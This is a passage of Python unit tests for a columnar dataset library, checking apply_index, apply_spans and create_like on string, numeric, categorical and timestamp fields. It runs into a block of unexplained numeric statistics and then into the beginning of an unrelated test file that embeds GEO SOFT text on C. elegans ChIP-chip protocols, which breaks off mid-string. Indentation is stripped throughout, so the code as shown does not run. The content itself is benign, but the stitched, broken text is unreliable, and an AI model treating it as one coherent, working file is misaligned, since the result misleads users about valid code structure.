fg = f.create_like(df, 'fg')
fgr = g.apply_index(inds, fg)
self.assertListEqual(expected_filt_indices, fg.indices[:].tolist())
self.assertListEqual(expected_filt_values, fg.values[:].tolist())
self.assertListEqual(expected_filt_data, fg.data[:])
self.assertListEqual(expected_filt_indices, fgr.indices[:].tolist())
self.assertListEqual(expected_filt_values, fgr.values[:].tolist())
self.assertListEqual(expected_filt_data, fgr.data[:])
fh = g.apply_index(inds)
self.assertListEqual(expected_filt_indices, fh.indices[:].tolist())
self.assertListEqual(expected_filt_values, fh.values[:].tolist())
self.assertListEqual(expected_filt_data, fh.data[:])
mf = fields.IndexedStringMemField(s)
mf.data.write(data)
self.assertListEqual(expected_indices, mf.indices[:].tolist())
self.assertListEqual(expected_values, mf.values[:].tolist())
self.assertListEqual(data, mf.data[:])
mf.apply_index(inds, in_place=True)
self.assertListEqual(expected_filt_indices, mf.indices[:].tolist())
self.assertListEqual(expected_filt_values, mf.values[:].tolist())
self.assertListEqual(expected_filt_data, mf.data[:])
b = df.create_indexed_string('bar')
b.data.write(data)
self.assertListEqual(expected_indices, b.indices[:].tolist())
self.assertListEqual(expected_values, b.values[:].tolist())
self.assertListEqual(data, b.data[:])
mb = b.apply_index(inds)
self.assertListEqual(expected_filt_indices, mb.indices[:].tolist())
self.assertListEqual(expected_filt_values, mb.values[:].tolist())
self.assertListEqual(expected_filt_data, mb.data[:])
def test_fixed_string_apply_index(self):
data = np.array([b'a', b'bb', b'ccc', b'dddd', b'eeee', b'fff', b'gg', b'h'], dtype='S4')
indices = np.array([7, 0, 6, 1, 5, 2, 4, 3], dtype=np.int32)
expected = [b'h', b'a', b'gg', b'bb', b'fff', b'ccc', b'eeee', b'dddd']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_fixed_string('foo', 4)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_index(indices, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_index(indices, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_index(indices)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.FixedStringMemField(s, 4)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_index(indices, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_fixed_string('bar', 4)
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_index(indices)
self.assertListEqual(expected, mb.data[:].tolist())
def test_numeric_apply_index(self):
data = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9], dtype='int32')
indices = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
expected = [9, 1, 8, 2, 7, 3, 6, 4, 5]
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_numeric('foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_index(indices, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_index(indices, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_index(indices)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.NumericMemField(s, 'int32')
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_index(indices, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_numeric('bar', 'int32')
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_index(indices)
self.assertListEqual(expected, mb.data[:].tolist())
def test_categorical_apply_index(self):
data = np.array([0, 1, 2, 0, 1, 2, 2, 1, 0], dtype=np.int32)
keys = {b'a': 0, b'b': 1, b'c': 2}
indices = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
expected = [0, 0, 1, 1, 2, 2, 2, 0, 1]
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_categorical('foo', 'int8', keys)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_index(indices, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_index(indices, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_index(indices)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.CategoricalMemField(s, 'int8', keys)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_index(indices, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_categorical('bar', 'int8', keys)
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_index(indices)
self.assertListEqual(expected, mb.data[:].tolist())
def test_timestamp_apply_index(self):
from datetime import datetime as D
from datetime import timezone
data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
D(2110, 11, 1, tzinfo=timezone.utc), D(2002, 3, 3, tzinfo=timezone.utc), D(2018, 2, 28, tzinfo=timezone.utc), D(2400, 9, 1, tzinfo=timezone.utc)]
data = np.asarray([d.timestamp() for d in data], dtype=np.float64)
indices = np.array([7, 0, 6, 1, 5, 2, 4, 3], dtype=np.int32)
expected = data[indices].tolist()
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_timestamp('foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_index(indices, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_index(indices, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_index(indices)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.TimestampMemField(s)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_index(indices, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_timestamp('bar')
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_index(indices)
self.assertListEqual(expected, mb.data[:].tolist())
class TestFieldApplySpansCount(unittest.TestCase):
def _test_apply_spans_src(self, spans, src_data, expected, create_fn, apply_fn):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = create_fn(df)
f.data.write(src_data)
actual = apply_fn(f, spans, None)
if actual.indexed:
self.assertListEqual(expected, actual.data[:])
else:
self.assertListEqual(expected, actual.data[:].tolist())
def test_indexed_string_apply_spans(self):
spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
src_data = ['a', 'bb', 'ccc', 'dddd', 'eeee', 'fff', 'gg', 'h']
expected = ['a', 'ccc', 'dddd', 'gg']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_indexed_string('foo'),
lambda f, p, d: f.apply_spans_first(p, d))
expected = ['bb', 'ccc', 'fff', 'h']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_indexed_string('foo'),
lambda f, p, d: f.apply_spans_last(p, d))
expected = ['a', 'ccc', 'dddd', 'gg']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_indexed_string('foo'),
lambda f, p, d: f.apply_spans_min(p, d))
expected = ['bb', 'ccc', 'fff', 'h']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_indexed_string('foo'),
lambda f, p, d: f.apply_spans_max(p, d))
def test_fixed_string_apply_spans(self):
spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
src_data = [b'a1', b'a2', b'b1', b'c1', b'c2', b'c3', b'd1', b'd2']
expected = [b'a1', b'b1', b'c1', b'd1']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_fixed_string('foo', 2),
lambda f, p, d: f.apply_spans_first(p, d))
expected = [b'a2', b'b1', b'c3', b'd2']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_fixed_string('foo', 2),
lambda f, p, d: f.apply_spans_last(p, d))
expected = [b'a1', b'b1', b'c1', b'd1']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_fixed_string('foo', 2),
lambda f, p, d: f.apply_spans_min(p, d))
expected = [b'a2', b'b1', b'c3', b'd2']
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_fixed_string('foo', 2),
lambda f, p, d: f.apply_spans_max(p, d))
def test_numeric_apply_spans(self):
spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
src_data = [1, 2, 11, 21, 22, 23, 31, 32]
expected = [1, 11, 21, 31]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_numeric('foo', 'int32'),
lambda f, p, d: f.apply_spans_first(p, d))
expected = [2, 11, 23, 32]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_numeric('foo', 'int32'),
lambda f, p, d: f.apply_spans_last(p, d))
expected = [1, 11, 21, 31]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_numeric('foo', 'int32'),
lambda f, p, d: f.apply_spans_min(p, d))
expected = [2, 11, 23, 32]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_numeric('foo', 'int32'),
lambda f, p, d: f.apply_spans_max(p, d))
def test_categorical_apply_spans(self):
spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
src_data = [0, 1, 2, 0, 1, 2, 0, 1]
keys = {b'a': 0, b'b': 1, b'c': 2}
expected = [0, 2, 0, 0]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_categorical('foo', 'int8', keys),
lambda f, p, d: f.apply_spans_first(p, d))
expected = [1, 2, 2, 1]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_categorical('foo', 'int8', keys),
lambda f, p, d: f.apply_spans_last(p, d))
expected = [0, 2, 0, 0]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_categorical('foo', 'int8', keys),
lambda f, p, d: f.apply_spans_min(p, d))
expected = [1, 2, 2, 1]
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_categorical('foo', 'int8', keys),
lambda f, p, d: f.apply_spans_max(p, d))
def test_timestamp_apply_spans(self):
spans = np.array([0, 2, 3, 6, 8], dtype=np.int32)
from datetime import datetime as D
from datetime import timezone
src_data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 1, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
D(2021, 1, 1, tzinfo=timezone.utc), D(2022, 5, 18, tzinfo=timezone.utc), D(2951, 8, 17, tzinfo=timezone.utc), D(1841, 10, 11, tzinfo=timezone.utc)]
src_data = np.asarray([d.timestamp() for d in src_data], dtype=np.float64)
expected = src_data[[0, 2, 3, 6]].tolist()
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_timestamp('foo'),
lambda f, p, d: f.apply_spans_first(p, d))
expected = src_data[[1, 2, 5, 7]].tolist()
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_timestamp('foo'),
lambda f, p, d: f.apply_spans_last(p, d))
expected = src_data[[0, 2, 3, 7]].tolist()
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_timestamp('foo'),
lambda f, p, d: f.apply_spans_min(p, d))
expected = src_data[[1, 2, 5, 6]].tolist()
self._test_apply_spans_src(spans, src_data, expected,
lambda df: df.create_timestamp('foo'),
lambda f, p, d: f.apply_spans_max(p, d))
class TestFieldCreateLike(unittest.TestCase):
def test_indexed_string_field_create_like(self):
data = ['a', 'bb', 'ccc', 'ddd']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_indexed_string('foo')
f.data.write(data)
self.assertListEqual(data, f.data[:])
g = f.create_like()
self.assertIsInstance(g, fields.IndexedStringMemField)
self.assertEqual(0, len(g.data))
h = f.create_like(df, "h")
self.assertIsInstance(h, fields.IndexedStringField)
self.assertEqual(0, len(h.data))
def test_fixed_string_field_create_like(self):
data = np.asarray([b'a', b'bb', b'ccc', b'dddd'], dtype='S4')
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_fixed_string('foo', 4)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like()
self.assertIsInstance(g, fields.FixedStringMemField)
self.assertEqual(0, len(g.data))
h = f.create_like(df, "h")
self.assertIsInstance(h, fields.FixedStringField)
self.assertEqual(0, len(h.data))
def test_numeric_field_create_like(self):
data = np.asarray([1, 2, 3, 4], dtype=np.int32)
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_numeric('foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like()
self.assertIsInstance(g, fields.NumericMemField)
self.assertEqual(0, len(g.data))
h = f.create_like(df, "h")
self.assertIsInstance(h, fields.NumericField)
self.assertEqual(0, len(h.data))
def test_categorical_field_create_like(self):
data = np.asarray([0, 1, 1, 0], dtype=np.int8)
key = {b'a': 0, b'b': 1}
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_categorical('foo', 'int8', key)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like()
self.assertIsInstance(g, fields.CategoricalMemField)
self.assertEqual(0, len(g.data))
h = f.create_like(df, "h")
self.assertIsInstance(h, fields.CategoricalField)
self.assertEqual(0, len(h.data))
def test_timestamp_field_create_like(self):
from datetime import datetime as D
from datetime import timezone
data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc)]
data = np.asarray([d.timestamp() for d in data], dtype=np.float64)
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_timestamp('foo')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like()
self.assertIsInstance(g, fields.TimestampMemField)
self.assertEqual(0, len(g.data))
h = f.create_like(df, "h")
self.assertIsInstance(h, fields.TimestampField)
self.assertEqual(0, len(h.data))
class TestFieldCreateLikeWithGroups(unittest.TestCase):
def test_indexed_string_field_create_like(self):
data = ['a', 'bb', 'ccc', 'ddd']
bio = BytesIO()
with h5py.File(bio, 'w') as ds:
with session.Session() as s:
df = ds.create_group('df')
f = s.create_indexed_string(df, 'foo')
f.data.write(data)
self.assertListEqual(data, f.data[:])
g = f.create_like(df, "g")
self.assertIsInstance(g, fields.IndexedStringField)
self.assertEqual(0, len(g.data))
def test_fixed_string_field_create_like(self):
data = np.asarray([b'a', b'bb', b'ccc', b'dddd'], dtype='S4')
bio = BytesIO()
with h5py.File(bio, 'w') as ds:
with session.Session() as s:
df = ds.create_group('df')
f = s.create_fixed_string(df, 'foo', 4)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like(df, "g")
self.assertIsInstance(g, fields.FixedStringField)
self.assertEqual(0, len(g.data))
def test_numeric_field_create_like(self):
expected = [1, 2, 3, 4]
data = np.asarray(expected, dtype=np.int32)
bio = BytesIO()
with h5py.File(bio, 'w') as ds:
with session.Session() as s:
df = ds.create_group('df')
f = s.create_numeric(df, 'foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like(df, "g")
self.assertIsInstance(g, fields.NumericField)
self.assertEqual(0, len(g.data))
def test_categorical_field_create_like(self):
data = np.asarray([0, 1, 1, 0], dtype=np.int8)
key = {b'a': 0, b'b': 1}
bio = BytesIO()
with h5py.File(bio, 'w') as ds:
with session.Session() as s:
df = ds.create_group('df')
f = s.create_categorical(df, 'foo', 'int8', key)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like(df, "g")
self.assertIsInstance(g, fields.CategoricalField)
self.assertEqual(0, len(g.data))
self.assertDictEqual({0: b'a', 1: b'b'}, g.keys)
def test_timestamp_field_create_like(self):
from datetime import datetime as D
from datetime import timezone
data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc)]
data = np.asarray([d.timestamp() for d in data], dtype=np.float64)
bio = BytesIO()
with h5py.File(bio, 'w') as ds:
with session.Session() as s:
df = ds.create_group('df')
f = s.create_timestamp(df, 'foo')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
g = f.create_like(df, "g")
self.assertIsInstance(g, fields.TimestampField)
self.assertEqual(0, len(g.data))
| 42.126168
| 167
| 0.553078
| 7,112
| 54,090
| 4.071147
| 0.044713
| 0.116806
| 0.110037
| 0.059266
| 0.881847
| 0.857084
| 0.833115
| 0.816433
| 0.800304
| 0.795089
| 0
| 0.043783
| 0.293566
| 54,090
| 1,283
| 168
| 42.159002
| 0.713957
| 0.004419
| 0
| 0.739346
| 0
| 0
| 0.022093
| 0
| 0
| 0
| 0
| 0
| 0.224975
| 1
| 0.06442
| false
| 0
| 0.026759
| 0
| 0.103072
| 0.000991
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f557b8f9330c91130b2b8eb307c4fd14501036d
| 15,782
|
py
|
Python
|
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | 14
|
2015-12-25T14:20:25.000Z
|
2022-01-01T07:31:56.000Z
|
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | null | null | null |
test/CoreLib/test_FeatIO.py
|
jianTaoLiu-SWJTU2012/taolib
|
6c3d6bdbfc8d6038ce4835f6e149c0f3dba8ca4d
|
[
"BSD-3-Clause"
] | 11
|
2016-11-06T06:27:10.000Z
|
2021-06-16T16:11:01.000Z
|
#!/usr/bin/env python
from Cistrome.CoreLib.FeatIO import SOFT
import unittest
class TestSOFT(unittest.TestCase):
def setUp(self):
self.softstring = """
GEO SOFT Filed Name Protocaol Name Protocol Content
The Experiment is AB1791_H3_GLP1TS_AD_1_EVERETT
!Sample_amplification_protocol_ch1 Worm_LM-PCR_Amplification_for_ChIP-chip_v1 Worm_LM-PCR_Amplification_for_ChIP-chip_v1. ChIP DNA was amplified with a modified ligation mediated PCR (LM-PCR) protocol derived from Ren, R et al (2000) Science 290, 2306-9.
!Sample_amplification_protocol_ch2 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_comment_ch1
!Sample_amplification_protocol_comment_ch2
!Sample_biomaterial_provider_ch1
!Sample_biomaterial_provider_ch2
!Sample_characteristics_ch1
!Sample_characteristics_ch2
!Sample_data_processing ChIP-chip_normalization_standard_MA2C_v1 ChIP-chip_normalization_standard_MA2C_v1. First, all the IP and INPUT log ratio values are read from the pairdata file. Secondly, we build GC bins for INPUT and IP based on the GC counts for every probe sequence, which means the INPUT or IP values for any probes who have the same GC counts will be put together. After that, for each GC bin, we calculate the mean for IP and INPUT data, and the covariance between this two channels. By default, the robust mean variance method is applied, which generalizes Tukeys theory of bi-weight estimation where the constant C is set to 2. At last, we adjust the log ratio values for each probe by using the mean and covariance values for their corresponding GC bins, then these values are further normalized by their mean and standard derivation. In case of replicates, when we calculate the MA2Cscore afterwards, we take the median as the score from all the replicates for all the probes within the sliding window defined by bandwidth parameter.
!Sample_description
!Sample_extract_protocol_ch1 Worm_chromatin_immunoprecipitation_vCW1 Worm_chromatin_immunoprecipitation_vCW1. 2mg extract was used for each ChIP with 5% taken as input directly into elution buffer (1% SDS in TE, 0.1M NaHCO3). Antibody was added to each IP sample and incubated overnight at 4C. Immune complexes were incubated (2hrs at 4C) with 10 ul of protein A sepharose, and washed 5 minutes each with 1.4 mL of each of the following solutions: ChIP Buffer, ChIP Buffer+500mM NaCl, ChIP Buffer+1M NaCl, LiCl solution (10mM Tris-HCl pH 8.0, 250mM LiCl, 0.5% NP-40, 0.5% sodium deoxycholate, 1mM EDTA), and 1X TE (10mM Tris-HCl pH 8.0, 1mM EDTA) and treated with 20ug RNase A for 30 minutes. Samples were then washed once with 1X TE and eluted twice with 200uL elution buffer for 15minutes. 16ul 5M NaCl was added to each sample then transferred to 65C overnight to reverse crosslinks. DNA was cleaned up with a Zymo DNA clean up kit. For a detailed protocol see http://www.modencode.org/.
!Sample_extract_protocol_ch2
!Sample_extract_protocol_comment_ch1
!Sample_extract_protocol_comment_ch2
!Sample_geo_accession
!Sample_growth_protocol_ch1 Worm_L3_growth_and_harvest_vPK1 Worm_L3_growth_and_harvest_vPK1. About 2-7 million of worms are bleached and then hatched in M9 for 24-42 hrs. About 100 embryos are seeded onto the plate to test for contamination and hatching efficiency. Remaining hatched L1 larvae are inoculated in a proper volume of liquid culture. Next day when larvae reach the L3 stage they are cleaned by M9 washes and sucrose gradient and collected by freezing in liquid nitrogen. Just before collection DIC pictures are taken and about 50ul of worms are stained for DAPI to assess the stage.
!Sample_growth_protocol_ch2 Worm_embryo_growth_and_harvest_v1 Worm_embryo_growth_and_harvest_v1. Embryos were prepared by bleaching from gravid N2 adults grown in standard S-basal media liquid culture. Live embryos were cross-linked in M9 + 2% formaldehyde for 30 minutes at room temperature followed by quenching with 125mM glycine for 5 minutes. Embryos were then washed twice with M9 Buffer and once by FA buffer (50 mM HEPES/KOH pH 7.5, 1 mM EDTA, 1% Triton X-100, 0.1 % sodium deoxycholate; 150 mM NaCl). Pellets were frozen at -80C. For a detailed protocol see http://www.modencode.org/.
!Sample_growth_protocol_comment_ch1
!Sample_growth_protocol_comment_ch2
!Sample_hyb_protocol ChIP-chip_label_hyb_nimblegen_v1 ChIP-chip_label_hyb_nimblegen_v1. DNA was labeled and hybridized to C. elegans tiling array by Roche NimbleGen according to the protocol described in chapter 3 and 4 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, Amplified IP or input DNA was either labeled with Cy5 or Cy3 in the presence of Klenow fragment. The reaction was stopped by the addition of EDTA. Labeled DNA was recovered by isopropanol precipitation, and dried. The labeled DNA was hybridized to C. elegans tiling array for 16 - 20 hours at 42?C.
!Sample_label_ch1 Cy3 Cy3
!Sample_label_ch2 Cy5 Cy5
!Sample_molecule_ch1 genomic DNA genomic DNA
!Sample_molecule_ch2 mRNA mRNA
!Sample_organism_ch1 Caenorhabditis elegans Caenorhabditis elegans
!Sample_organism_ch2 Caenorhabditis elegans Caenorhabditis elegans
!Sample_platform_id
!Sample_scan_protocol ChIP-chip_scanning_nimblegen_v1 ChIP-chip_scanning_nimblegen_v1. Array scanning and raw data extraction were performed at Roche NimbleGen, according to the protocol described in chapter 5 and 6 of the NimbleGen Arrays User?s Guide ChIP-chip Analysis, Version 3.1, 27 May 2008. Briefly, array signal was scanned by using a GenePix 4000B Scanner with associated software and saved as .tif files of the 532nm and 635nm images individually. Raw signal intensities of the images were extracted and saved as .pair files by using NimbleScan software according to the NimbleScan v2.4 User?s Guide.
!Sample_source_name_ch1
!Sample_source_name_ch2
!Sample_title AB1791_H3_GLP1TS_AD_1_EVERETT
!Sample_treatment_protocol_ch1 Worm_L3_extraction_vPK1 Worm_L3_extraction_vPK1. Worms are frozen, ground, and crosslinked for 10 minutes in 1% formaldehyde. Later, washed pellets are resuspended in FA buffer and subjected to sonication in Bioruptor (14 pulses of 30 seconds with 1 minute rests in between). Extracts are then spun down and soluble fraction is stored for quality tests and future ChIP.
!Sample_treatment_protocol_ch2 Worm_embryo_extraction_v1 Worm_embryo_extraction_v1. Embryos were resuspended in FA buffer (50 mM HEPES/KOH pH 7.5, 1 mM EDTA, 1% Triton X-100, 0.1 % sodium deoxycholate; 150 mM NaCl) + protease inhibitors (Calbiochem Cat# 539131). Using a Branson sonifier microtip, samples were sonicated on ice at the following settings: 35% amplitude, 0.9 sec on, 0.1 sec off, 12 pulses, 7 times. Cell debris was removed by centrifuging at 13,000 g for 15 minutes at 4?C and taking the supernatant. Protein concentration was determined by Bradford Assay and extracts were aliquoted at stored at -80C. For a detailed protocol see http://www.modencode.org/.
!Sample_treatment_protocol_comment_ch1
!Sample_treatment_protocol_comment_ch2
^SAMPLE AB1791_H3_GLP1TS_AD_1_EVERETT
The Experiment is AB1791_H3_N2_L3_1LM
!Sample_amplification_protocol_ch1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_ch2 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1 Worm_LM-PCR_Amplification_for_ChIP-chip_vPK1. 1/3 of ChIP and 10ng of input are blunted (T4 polymerase), ligated (concentrated T4 ligase) to annealed linkers and amplified by PCR using longer oligonucleotide as a primer. Generally two rounds of amplification are used to get the amount needed for microarray. Amplified DNA is tested by q-PCR and DNA gel is run to ensure small size and lack of degradation.
!Sample_amplification_protocol_comment_ch1
!Sample_amplification_protocol_comment_ch2
!Sample_antibody_name AB1791_H3 An affinity purified rabbit polyclonal antibody to H3 obtained from Abcam (H3-AB1791);used for ChIP.
!Sample_biomaterial_provider_ch1
!Sample_biomaterial_provider_ch2
!Sample_characteristics_ch1
!Sample_characteristics_ch2
!Sample_data_processing ChIP-chip_normalization_standard_MA2C_v1 ChIP-chip_normalization_standard_MA2C_v1. First, all the IP and INPUT log ratio values are read from the pairdata file. Secondly, we build GC bins for INPUT and IP based on the GC counts for every probe sequence, which means the INPUT or IP values for any probes who have the same GC counts will be put together. After that, for each GC bin, we calculate the mean for IP and INPUT data, and the covariance between this two channels. By default, the robust mean variance method is applied, which generalizes Tukeys theory of bi-weight estimation where the constant C is set to 2. At last, we adjust the log ratio values for each probe by using the mean and covariance values for their corresponding GC bins, then these values are further normalized by their mean and standard derivation. In case of replicates, when we calculate the MA2Cscore afterwards, we take the median as the score from all the replicates for all the probes within the sliding window defined by bandwidth parameter.
!Sample_description
!Sample_extract_protocol_ch1 Worm_chromatin_immunoprecipitation_vPK1 Worm_chromatin_immunoprecipitation_vPK1. Appropriate amount of extract is incubated overnight with a proper amount of antibody (exceptional antibodies due to better results are incubated 2hrs). Afterwards, 40ul of equilibrated magnetic beads (either protein A or G, depending on antibody) are added and incubated for 2 hrs. Later, washes with FA, 500mM-salt FA, 1M salt FA, TEL, and TE buffer are performed and DNA is eluted in elution buffer (1% SDS in TE with 250 mM NaCl) ? two times with 57 ml volume each, at 65?C. Samples are treated with RNAse, proteinase K and then crosslinks are reversed overnight at 65?C. DNA is purified on qiagen PCR purification columns, tested by q-PCR for ChIP quality, and stored in -20?C for future applications and.
!Sample_extract_protocol_ch2 Worm_chromatin_immunoprecipitation_vPK1 Worm_chromatin_immunoprecipitation_vPK1. Appropriate amount of extract is incubated overnight with a proper amount of antibody (exceptional antibodies due to better results are incubated 2hrs). Afterwards, 40ul of equilibrated magnetic beads (either protein A or G, depending on antibody) are added and incubated for 2 hrs. Later, washes with FA, 500mM-salt FA, 1M salt FA, TEL, and TE buffer are performed and DNA is eluted in elution buffer (1% SDS in TE with 250 mM NaCl) ? two times with 57 ml volume each, at 65?C. Samples are treated with RNAse, proteinase K and then crosslinks are reversed overnight at 65?C. DNA is purified on qiagen PCR purification columns, tested by q-PCR for ChIP quality, and stored in -20?C for future applications and.
!Sample_extract_protocol_comment_ch1
!Sample_extract_protocol_comment_ch2
!Sample_geo_accession
